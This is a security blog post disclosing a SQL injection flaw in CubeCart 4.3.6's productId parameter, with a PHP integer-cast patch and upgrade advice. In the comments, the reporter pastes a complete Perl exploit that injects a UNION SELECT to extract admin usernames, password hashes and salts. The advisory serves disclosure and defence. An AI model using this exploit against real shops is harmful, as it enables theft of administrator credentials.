Security Information and Review

Collection of security information and review

CubeCart SQL Injection Vulnerability

Author : Admin

The latest vulnerabilities has been reported in CubeCart. With this vulnerability, an attacker can exploit CubeCart to manipulate and inject SQL queries. This vulnerability is caused input validation error in “includes/content/viewProd.inc.php” when processing the productId parameter. This issue is not going to happen if input passed to the productId parameter is properly sanitized before being used in SQL queries. This vulnerability is reported by sangteamtham and it’s confirmed in version 4.3.6 and prior versions may also be affected.

CubeCart is a fully featured ecommerce shopping cart solution used by over a million store owners around the world. CubeCart is an “out of the box” ecommerce shopping cart software solution which has been written to run on servers that have PHP & MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world.
There are a great deal of powerful features enabling your business to trade online successfully. It is easy to modify the look and feel of your store to match your company’s branding or to site comfortably beside your existing website due to CubeCart’s powerful HTML template system. Our solutions are robust, flexible, affordable and are supported by not only a profitable and stable company but a thriving community of enthusiasts who are keen to recommend it and share their ideas and experience.

The best solution of this issue is edit file “includes/content/viewPro.inc.php” and sanitize productId parameter before being used in SQL queries. For more details, see code below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 
	<?php
 
		………………..
 
		/* Before edit */
		$_GET[‘productId’] = sanitizeVar($_GET[‘productId’]);
 
		/* Relace with code below */
		$_GET[‘productId’] = (int)sanitizeVar($_GET[‘productId’]);
 
		……………..
 
	?>

If we can’t edit this file, the vendor of CubeCart has been released patches and we can upgrade to CubeCart version 4.3.7.

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Netvouz
  • DZone
  • ThisNext
  • MisterWong
  • Wists
  • Technorati
  • YahooMyWeb
  • Slashdot
  • StumbleUpon
Categories: Web Application Security
sangteamtham :
Please edit my name, sangteamtham, not Sangte Amtham. Every website made it so wrong.
20 November 09 at 23:10
sangteamtham :
here is my exploit. !usr/bin/perl -w ------------------------------------------------------------------------------------------------------------------- CubeCart 4.3.6 Release Remote SQL injection (lastest version) Author : sangteamtham Email : sangteamtham [at] gmail.com Homepage: hcegroup.net & vnbrain.net Great Thanks To: My Mother Hce group Vnbrain Sovietw0rm ------------------------------------------------------------------------------------------------------------------- Poc: / query database $_GET['productId'] = sanitizeVar($_GET['productId']); >>> that makes Vulnerability $query = "SELECT I.*, C.cat_name, C.cat_father_id FROM ".$glob['dbprefix']."CubeCart_inventory AS I LEFT JOIN ".$glob['dbprefix']."CubeCart_category AS C ON I.cat_id = C.cat_id WHERE I.disabled='0' AND I.productId = ".$db->mySQLSafe($_GET['productId']); $prodArray = $db->select($query); Affected version > = 4.xx ------------------------------------------------------------------------------------------------------------------- Fixing : add intval: $_GET['productId'] = intval(sanitizeVar($_GET['productId'])); ------------------------------------------------------------------------------------------------------------------- # print " [x]===============================================>>\n"; # print " [x] .::www.hcegroup.net::. \n"; # print " [x] CubeCart 4.3.6 Release\n"; # print " [x] Remote Command Execution Vulnerability\n"; # print " [x] Affected version: >= CubeCart 4\n"; # print " [x] hcegroup.net & vnbrain.net \n"; # print " [x] Code By Sangteamtham\n"; # print " [x] Found and Code on 17/11/2009\n"; # print " [x] Great Thanks flying To My Mother, Sovietw0rm\n"; # print " [x]===============================================>>\n"; # use LWP::UserAgent; # my $userAgent = LWP::UserAgent->new; # $server=shift; # $id=shift; # unless($server&&$id) { # die "\n[+] Use $0 www.google.com 3\nlink like http://www.google.com/index.php?_a=viewProd&productId=3\n"; # } # chomp($server); # my $vul_file = '/index.php?_a=viewProd&productId='; # my $sql_query = ' And 1=0 Union select group_concat(0x3a3a3a,username,0x3a,password,0x3a,salt,0x3a3a3a) from CubeCart_admin_users#'; # my $all = $vul_file.$id; # print " \n\n"; # print "--------------------START-------------------\r\n"; # print "[*] Start to exploiting...\n\n\n"; # print "[*] Be Patient...\n\n"; # my $url = "http://".$server.$all; # my $ex = $url.$sql_query; # my $Attack= $userAgent->get($ex); # my $content=$Attack->content; # $success=0; # print "[+] User details:\n\n"; # while($content =~ m/:::(.*?):(.*?):(.*?):::/g){ # $success++; # my $username = $1; # my $password = $2; # my $salt = $3; # print "[+]User detail $success:\n"; # print " Username: ".$username."\n"; # print " Password: ".$password."\n"; # print " Password salt: ".$salt."\n"; # } # if($success==0){ # print "[+]cant get admin info\n"; # } # else{ # print "[+] Exploiting successfully\n"; # }
20 November 09 at 23:11
thank's for sharing your exploit. I will learn and try ..
30 November 09 at 11:07
I'm sorry Mr .. I don't know, btw, where are you come from ..? Thailand ..?
30 November 09 at 11:09
wow great information thanks
4 January 10 at 19:53
I am from Vietnam.nice to talk to u
8 March 10 at 15:32
I am from Viet Nam.
23 June 10 at 02:55
If you like this posts, please leave messages / comments.